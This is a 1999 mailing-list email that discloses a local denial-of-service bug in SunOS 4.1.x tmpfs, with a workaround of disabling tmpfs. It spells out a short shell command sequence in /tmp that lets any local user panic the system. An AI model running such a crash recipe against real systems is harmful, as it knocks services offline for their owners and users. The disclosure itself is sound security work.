Date: Fri, 3 Sep 1999 11:06:45 -0700
From: Timothy Demarest <[email protected]>
To: [email protected]Subject: SunOS 4.1.3 and 4.1.4 tmpfs DoS
While searching SunSolve for a completely unrelated issue, I came across
two bug reports (1115820, 1111248) that describe a way for any user to
panic a system running SunOS 4.1.1, 4.1.3, 4.1.3_U1, and 4.1.4. While the
bugs have been reported to Sun, no patch is available. There is a simple
workaround, if you dont' require tmpfs.
I have never seen this reported, so it might be good to share this with a
wider audience. I don't want my users using this as a DoS against our older
servers.
Requirements:
- The system must have /tmp mounted on swap (tmpfs)
- /tmp must be writable by the UID that will crash the machine. Since tmp
is frequently has full permissions (drwxrwxrwt), this is fairly common
How to panic the system:
cd /tmp
mkdir xx
cd xx
rmdir ../xx
touch yy
cd /
The system will then panic with "assertion failed: tp->tn_dir == NULL,
file: ../../tmpfs/tmp_tnode.c, line: 167" (from SunOS 4.1.4).
The workaround:
As specified in the bug reports, "do not use tmpfs."
I tested this only on SunOS 4.1.4 systems, but the bug reports list other
SunOS 4.1.x versions as well.
TIm
--
Timothy Demarest ArrayComm, Inc.
[email protected] 3141 Zanker Road
http://www.arraycomm.com San Jose, CA 95134
